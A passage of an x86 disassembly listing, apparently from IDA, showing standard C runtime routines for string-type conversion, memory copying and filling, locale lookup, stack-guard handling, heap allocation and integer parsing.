ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_405D18
call __SEH_prolog
xor esi, esi
cmp dword_40749C, esi
jnz short loc_4043D1
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_405CEC
push edi
call ds:dword_4050E8 ; GetStringTypeW
test eax, eax
jz short loc_4043BC
mov dword_40749C, edi
jmp short loc_4043D1
; ---------------------------------------------------------------------------
loc_4043BC: ; CODE XREF: sub_404386+2C�j
call ds:dword_405090 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_4043D1
mov dword_40749C, 2
loc_4043D1: ; CODE XREF: sub_404386+14�j
; sub_404386+34�j ...
mov eax, dword_40749C
cmp eax, 2
jz loc_4044C9
cmp eax, esi
jz loc_4044C9
cmp eax, 1
jnz loc_4044EF
mov [ebp+var_24], esi
mov [ebp+var_20], esi
cmp [ebp+arg_10], esi
jnz short loc_404403
mov eax, dword_407490
mov [ebp+arg_10], eax
loc_404403: ; CODE XREF: sub_404386+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call ds:dword_4050DC ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_4044EF
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_4048A0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_404474
; ---------------------------------------------------------------------------
loc_40445F: ; DATA XREF: .rdata:stru_405D18�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404463: ; DATA XREF: .rdata:stru_405D18�o
mov esp, [ebp+ms_exc.old_esp]
call sub_404B0C
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_404474: ; CODE XREF: sub_404386+D7�j
test esi, esi
jnz short loc_40448F
push edi
push 2
call sub_404BEF
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_4044EF
mov [ebp+var_20], 1
loc_40448F: ; CODE XREF: sub_404386+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4050DC ; MultiByteToWideChar
test eax, eax
jz short loc_4044B7
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_4050E8 ; GetStringTypeW
mov [ebp+var_24], eax
loc_4044B7: ; CODE XREF: sub_404386+11E�j
cmp [ebp+var_20], 0
jz short loc_4044C4
push esi
call sub_402F0B
pop ecx
loc_4044C4: ; CODE XREF: sub_404386+135�j
mov eax, [ebp+var_24]
jmp short loc_404537
; ---------------------------------------------------------------------------
loc_4044C9: ; CODE XREF: sub_404386+53�j
; sub_404386+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_4044D6
mov ebx, dword_407480
loc_4044D6: ; CODE XREF: sub_404386+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_4044E3
mov edi, dword_407490
loc_4044E3: ; CODE XREF: sub_404386+155�j
push ebx
call sub_404900
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_4044F3
loc_4044EF: ; CODE XREF: sub_404386+64�j
; sub_404386+A5�j ...
xor eax, eax
jmp short loc_404537
; ---------------------------------------------------------------------------
loc_4044F3: ; CODE XREF: sub_404386+167�j
cmp eax, edi
jz short loc_404515
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_404943
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_4044EF
mov [ebp+arg_4], esi
loc_404515: ; CODE XREF: sub_404386+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_4050E4 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_404535
push esi
call sub_402F0B
pop ecx
loc_404535: ; CODE XREF: sub_404386+1A6�j
mov eax, edi
loc_404537: ; CODE XREF: sub_404386+141�j
; sub_404386+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_404386 endp
; =============== S U B R O U T I N E =======================================
sub_404540 proc near ; CODE XREF: sub_402F89+1F�p
; sub_403E30+113�p ...
arg_0 = dword ptr 4
mov eax, dword_4074A0
test eax, eax
jz short loc_404558
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404558
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404558: ; CODE XREF: sub_404540+7�j
; sub_404540+12�j
xor eax, eax
retn
sub_404540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404560 proc near ; CODE XREF: sub_403380+2DE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404580
cmp edi, eax
jb loc_4046FC
loc_404580: ; CODE XREF: sub_404560+16�j
test edi, 3
jnz short loc_40459C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4045BC
rep movsd
jmp ds:off_4046AC[edx*4]
; ---------------------------------------------------------------------------
loc_40459C: ; CODE XREF: sub_404560+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4045B4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4045BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4045B4: ; CODE XREF: sub_404560+46�j
jmp dword ptr ds:loc_4046BC[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4045BC: ; CODE XREF: sub_404560+31�j
; sub_404560+8E�j ...
jmp ds:off_404640[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4045D0
dd offset loc_4045FC
dd offset loc_404620
; ---------------------------------------------------------------------------
loc_4045D0: ; DATA XREF: sub_404560+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4045BC
rep movsd
jmp ds:off_4046AC[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4045FC: ; DATA XREF: sub_404560+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4045BC
rep movsd
jmp ds:off_4046AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404620: ; DATA XREF: sub_404560+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4045BC
rep movsd
jmp ds:off_4046AC[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404640 dd offset loc_4046A3 ; DATA XREF: sub_404560:loc_4045BC�r
dd offset loc_404690
dd offset loc_404688
dd offset loc_404680
dd offset loc_404678
dd offset loc_404670
dd offset loc_404668
dd offset loc_404660
; ---------------------------------------------------------------------------
loc_404660: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404668: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404670: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404678: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404680: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404688: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404690: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4046A3: ; CODE XREF: sub_404560:loc_4045BC�j
; DATA XREF: sub_404560:off_404640�o
jmp ds:off_4046AC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4046AC dd offset loc_4046BC ; DATA XREF: sub_404560+35�r
; sub_404560+92�r ...
dd offset loc_4046C4
dd offset loc_4046D0
dd offset loc_4046E4
; ---------------------------------------------------------------------------
loc_4046BC: ; CODE XREF: sub_404560+35�j
; sub_404560+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4046C4: ; CODE XREF: sub_404560+35�j
; sub_404560+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4046D0: ; CODE XREF: sub_404560+35�j
; sub_404560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4046E4: ; CODE XREF: sub_404560+35�j
; sub_404560+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4046FC: ; CODE XREF: sub_404560+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404730
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404724
std
rep movsd
cld
jmp ds:off_404848[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404724: ; CODE XREF: sub_404560+1B5�j
; sub_404560+210�j ...
neg ecx
jmp ds:off_4047F8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404730: ; CODE XREF: sub_404560+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404748
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_404748+4[eax*4]
; ---------------------------------------------------------------------------
loc_404748: ; CODE XREF: sub_404560+1DA�j
; DATA XREF: sub_404560+1E1�r
jmp ds:off_404848[ecx*4]
; ---------------------------------------------------------------------------
align 10h
pop esp
inc edi
inc eax
add [eax-57FFBFB9h], al
inc edi
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_404724
std
rep movsd
cld
jmp ds:off_404848[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404724
std
rep movsd
cld
jmp ds:off_404848[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404724
std
rep movsd
cld
jmp ds:off_404848[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4047FC
dd offset loc_404804
dd offset loc_40480C
dd offset loc_404814
dd offset loc_40481C
dd offset loc_404824
dd offset loc_40482C
off_4047F8 dd offset loc_40483F ; DATA XREF: sub_404560+1C6�r
; ---------------------------------------------------------------------------
loc_4047FC: ; DATA XREF: sub_404560+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404804: ; DATA XREF: sub_404560+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_40480C: ; DATA XREF: sub_404560+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404814: ; DATA XREF: sub_404560+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_40481C: ; DATA XREF: sub_404560+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404824: ; DATA XREF: sub_404560+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_40482C: ; DATA XREF: sub_404560+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40483F: ; CODE XREF: sub_404560+1C6�j
; DATA XREF: sub_404560:off_4047F8�o
jmp ds:off_404848[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404848 dd offset loc_404858 ; DATA XREF: sub_404560+1BB�r
; sub_404560:loc_404748�r ...
dd offset loc_404860
dd offset loc_404870
dd offset loc_404884
; ---------------------------------------------------------------------------
loc_404858: ; CODE XREF: sub_404560+1BB�j
; sub_404560:loc_404748�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404860: ; CODE XREF: sub_404560+1BB�j
; sub_404560:loc_404748�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404870: ; CODE XREF: sub_404560+1BB�j
; sub_404560:loc_404748�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404884: ; CODE XREF: sub_404560+1BB�j
; sub_404560:loc_404748�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4048A0 proc near ; CODE XREF: sub_403FCA+2EF�p
; sub_403FCA+325�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4048FB
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4048EB
neg ecx
and ecx, 3
jz short loc_4048CD
sub edx, ecx
loc_4048C3: ; CODE XREF: sub_4048A0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_4048C3
loc_4048CD: ; CODE XREF: sub_4048A0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4048EB
rep stosd
test edx, edx
jz short loc_4048F5
loc_4048EB: ; CODE XREF: sub_4048A0+18�j
; sub_4048A0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_4048EB
loc_4048F5: ; CODE XREF: sub_4048A0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4048A0+A�j
mov eax, [esp+arg_0]
retn
sub_4048A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404900 proc near ; CODE XREF: sub_403FCA+27D�p
; sub_404386+15E�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_407030
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_405044 ; GetLocaleInfoA
test eax, eax
jnz short loc_40492F
or eax, 0FFFFFFFFh
jmp short loc_404939
; ---------------------------------------------------------------------------
loc_40492F: ; CODE XREF: sub_404900+28�j
lea eax, [ebp+var_C]
push eax
call sub_404C6A
pop ecx
loc_404939: ; CODE XREF: sub_404900+2D�j
mov ecx, [ebp+var_4]
call sub_40124E
leave
retn
sub_404900 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404943 proc near ; CODE XREF: sub_403FCA+2A8�p
; sub_403FCA+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_405D28
call __SEH_prolog
mov eax, dword_407030
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_34], edi
mov [ebp+var_44], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_40], ebx
mov [ebp+var_3C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_404AE9
lea ecx, [ebp+var_30]
push ecx
push eax
mov esi, ds:dword_4050C4
call esi ; GetCPInfo
test eax, eax
jz short loc_4049A7
cmp [ebp+var_30], 1
jnz short loc_4049A7
lea eax, [ebp+var_30]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_4049A7
cmp [ebp+var_30], 1
jnz short loc_4049A7
mov [ebp+var_3C], 1
loc_4049A7: ; CODE XREF: sub_404943+42�j
; sub_404943+48�j ...
cmp [ebp+var_3C], edi
jz short loc_4049C6
cmp ebx, 0FFFFFFFFh
jz short loc_4049B5
mov esi, ebx
jmp short loc_4049C1
; ---------------------------------------------------------------------------
loc_4049B5: ; CODE XREF: sub_404943+6C�j
push [ebp+arg_8]
call sub_402680
pop ecx
mov esi, eax
inc esi
loc_4049C1: ; CODE XREF: sub_404943+70�j
mov [ebp+var_38], esi
jmp short loc_4049C9
; ---------------------------------------------------------------------------
loc_4049C6: ; CODE XREF: sub_404943+67�j
mov esi, [ebp+var_38]
loc_4049C9: ; CODE XREF: sub_404943+81�j
cmp [ebp+var_3C], edi
jnz short loc_4049E8
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4050DC ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_38], esi
cmp esi, edi
jz short loc_404A40
loc_4049E8: ; CODE XREF: sub_404943+89�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_402310
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_4048A0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_404A2C
; ---------------------------------------------------------------------------
loc_404A15: ; DATA XREF: .rdata:stru_405D28�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404A19: ; DATA XREF: .rdata:stru_405D28�o
mov esp, [ebp+ms_exc.old_esp]
call sub_404B0C
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_38]
loc_404A2C: ; CODE XREF: sub_404943+D0�j
cmp ebx, edi
jnz short loc_404A4E
push esi
push 2
call sub_404BEF
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_404A47
loc_404A40: ; CODE XREF: sub_404943+A3�j
xor eax, eax
jmp loc_404AFB
; ---------------------------------------------------------------------------
loc_404A47: ; CODE XREF: sub_404943+FB�j
mov [ebp+var_44], 1
loc_404A4E: ; CODE XREF: sub_404943+EB�j
push esi
push ebx
push [ebp+var_40]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_4050DC ; MultiByteToWideChar
test eax, eax
jz loc_404AEC
cmp [ebp+arg_10], edi
jz short loc_404A8E
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_40508C ; WideCharToMultiByte
test eax, eax
jz short loc_404AEC
mov eax, [ebp+arg_10]
mov [ebp+var_34], eax
jmp short loc_404AEC
; ---------------------------------------------------------------------------
loc_404A8E: ; CODE XREF: sub_404943+129�j
cmp [ebp+var_3C], edi
jnz short loc_404AA9
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_40508C ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_404AEC
loc_404AA9: ; CODE XREF: sub_404943+14E�j
push esi
push 1
call sub_404BEF
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp eax, edi
jz short loc_404AEC
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_40508C ; WideCharToMultiByte
cmp eax, edi
jnz short loc_404ADC
push [ebp+var_34]
call sub_402F0B
pop ecx
mov [ebp+var_34], edi
jmp short loc_404AEC
; ---------------------------------------------------------------------------
loc_404ADC: ; CODE XREF: sub_404943+189�j
cmp [ebp+var_40], 0FFFFFFFFh
jz short loc_404AEC
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_404AEC
; ---------------------------------------------------------------------------
loc_404AE9: ; CODE XREF: sub_404943+2D�j
mov ebx, [ebp+var_48]
loc_404AEC: ; CODE XREF: sub_404943+120�j
; sub_404943+141�j ...
cmp [ebp+var_44], edi
jz short loc_404AF8
push ebx
call sub_402F0B
pop ecx
loc_404AF8: ; CODE XREF: sub_404943+1AC�j
mov eax, [ebp+var_34]
loc_404AFB: ; CODE XREF: sub_404943+FF�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
call sub_40124E
call __SEH_epilog
retn
sub_404943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B0C proc near ; CODE XREF: sub_403FCA+FD�p
; sub_403FCA+1CB�p ...
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 4
pop eax
call sub_402310
mov esi, esp
push 1Ch
lea eax, [ebp+var_28]
push eax
push esi
call ds:dword_4050B8 ; VirtualQuery
test eax, eax
jz short loc_404BA7
mov ebx, [ebp+var_24]
lea eax, [ebp+var_4C]
push eax
call ds:dword_4050EC ; GetSystemInfo
mov ecx, [ebp+var_48]
mov eax, dword_4072BC
lea edi, [ecx-1]
not edi
and edi, esi
sub edi, ecx
mov esi, eax
dec esi
neg esi
sbb esi, esi
and esi, 0FFFFFFF1h
add esi, 11h
imul esi, ecx
add esi, ebx
cmp edi, esi
mov [ebp+var_8], ecx
jb short loc_404BA7
cmp eax, 1
jz short loc_404BC8
mov [ebp+var_4], ebx
mov ebx, 1000h
loc_404B74: ; CODE XREF: sub_404B0C+84�j
push 1Ch
lea eax, [ebp+var_28]
push eax
push [ebp+var_4]
call ds:dword_4050B8 ; VirtualQuery
test eax, eax
jz short loc_404BA7
mov eax, [ebp+var_1C]
add [ebp+var_4], eax
test [ebp+var_18], ebx
jz short loc_404B74
test [ebp+var_13], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jz short loc_404BA3
xor eax, eax
inc eax
jmp short loc_404BE7
; ---------------------------------------------------------------------------
loc_404BA3: ; CODE XREF: sub_404B0C+90�j
cmp edi, eax
jnb short loc_404BAB
loc_404BA7: ; CODE XREF: sub_404B0C+22�j
; sub_404B0C+59�j ...
xor eax, eax
jmp short loc_404BE7
; ---------------------------------------------------------------------------
loc_404BAB: ; CODE XREF: sub_404B0C+99�j
cmp eax, esi
jnb short loc_404BB2
mov [ebp+var_4], esi
loc_404BB2: ; CODE XREF: sub_404B0C+A1�j
push 4
push ebx
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_4050CC ; VirtualAlloc
mov eax, dword_4072BC
jmp short loc_404BCB
; ---------------------------------------------------------------------------
loc_404BC8: ; CODE XREF: sub_404B0C+5E�j
mov [ebp+var_4], edi
loc_404BCB: ; CODE XREF: sub_404B0C+BA�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_C]
push ecx
inc eax
push eax
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_405040 ; VirtualProtect
loc_404BE7: ; CODE XREF: sub_404B0C+95�j
; sub_404B0C+9D�j
lea esp, [ebp-58h]
pop edi
pop esi
pop ebx
leave
retn
sub_404B0C endp
; =============== S U B R O U T I N E =======================================
sub_404BEF proc near ; CODE XREF: sub_404386+F5�p
; sub_404943+F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
imul esi, [esp+8+arg_4]
test esi, esi
push edi
mov ebx, esi
jnz short loc_404C02
inc esi
loc_404C02: ; CODE XREF: sub_404BEF+10�j
; sub_404BEF+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_404C42
cmp dword_407704, 3
jnz short loc_404C2D
add esi, 0Fh
and esi, 0FFFFFFF0h
cmp ebx, dword_4074B4
ja short loc_404C2D
push ebx
call sub_403B34
mov edi, eax
test edi, edi
pop ecx
jnz short loc_404C58
loc_404C2D: ; CODE XREF: sub_404BEF+21�j
; sub_404BEF+2F�j
push esi
push 8
push dword_407700
call ds:dword_4050C8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_404C64
loc_404C42: ; CODE XREF: sub_404BEF+18�j
cmp dword_4074A4, 0
jz short loc_404C64
push esi
call sub_404540
test eax, eax
pop ecx
jnz short loc_404C02
jmp short loc_404C66
; ---------------------------------------------------------------------------
loc_404C58: ; CODE XREF: sub_404BEF+3C�j
push ebx
push 0
push edi
call sub_4048A0
add esp, 0Ch
loc_404C64: ; CODE XREF: sub_404BEF+51�j
; sub_404BEF+5A�j
mov eax, edi
loc_404C66: ; CODE XREF: sub_404BEF+67�j
pop edi
pop esi
pop ebx
retn
sub_404BEF endp
; =============== S U B R O U T I N E =======================================
sub_404C6A proc near ; CODE XREF: sub_404900+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_404C72
; ---------------------------------------------------------------------------
loc_404C71: ; CODE XREF: sub_404C6A+14�j
inc esi
loc_404C72: ; CODE XREF: sub_404C6A+5�j
movzx eax, byte ptr [esi]
push eax
call sub_404CC2
test eax, eax
pop ecx
jnz short loc_404C71
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_404C90
cmp ecx, 2Bh
jnz short loc_404C94
loc_404C90: ; CODE XREF: sub_404C6A+1F�j
movzx ecx, byte ptr [esi]
inc esi
loc_404C94: ; CODE XREF: sub_404C6A+24�j
xor eax, eax
loc_404C96: ; CODE XREF: sub_404C6A+4D�j
cmp ecx, 30h
jl short loc_404CA5
cmp ecx, 39h
jg short loc_404CA5
sub ecx, 30h
jmp short loc_404CA8
; ---------------------------------------------------------------------------
loc_404CA5: ; CODE XREF: sub_404C6A+2F�j
; sub_404C6A+34�j
or ecx, 0FFFFFFFFh
loc_404CA8: ; CODE XREF: sub_404C6A+39�j
cmp ecx, 0FFFFFFFFh
jz short loc_404CB9
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_404C96
; ---------------------------------------------------------------------------
loc_404CB9: ; CODE XREF: sub_404C6A+41�j
cmp edx, 2Dh
pop esi
jnz short locret_404CC1
neg eax
locret_404CC1: ; CODE XREF: sub_404C6A+53�j
retn
sub_404C6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CC2 proc near ; CODE XREF: sub_404C6A+C�p
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
cmp ecx, 0FFh
jbe short loc_404D2F
and [ebp+var_4], 0
push edi
xor eax, eax
lea edi, [ebp+var_2]
stosw
mov eax, ecx
shr eax, 8
cmp dword_4074C8, 0
mov byte ptr [ebp+arg_0+2], al
mov byte ptr [ebp+arg_0+3], cl
pop edi
jnz short loc_404CF7
loc_404CF3: ; CODE XREF: sub_404CC2+59�j
; sub_404CC2+60�j ...
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_404CF7: ; CODE XREF: sub_404CC2+2F�j
push 1
push dword_4074C4
lea eax, [ebp+var_4]
push dword_4075E4
push eax
push 2
lea eax, [ebp+arg_0+2]
push eax
push 1
call sub_404386
add esp, 1Ch
test eax, eax
jz short loc_404CF3
cmp [ebp+var_2], 0
jnz short loc_404CF3
test byte ptr [ebp+var_4], 8
jz short loc_404CF3
xor eax, eax
inc eax
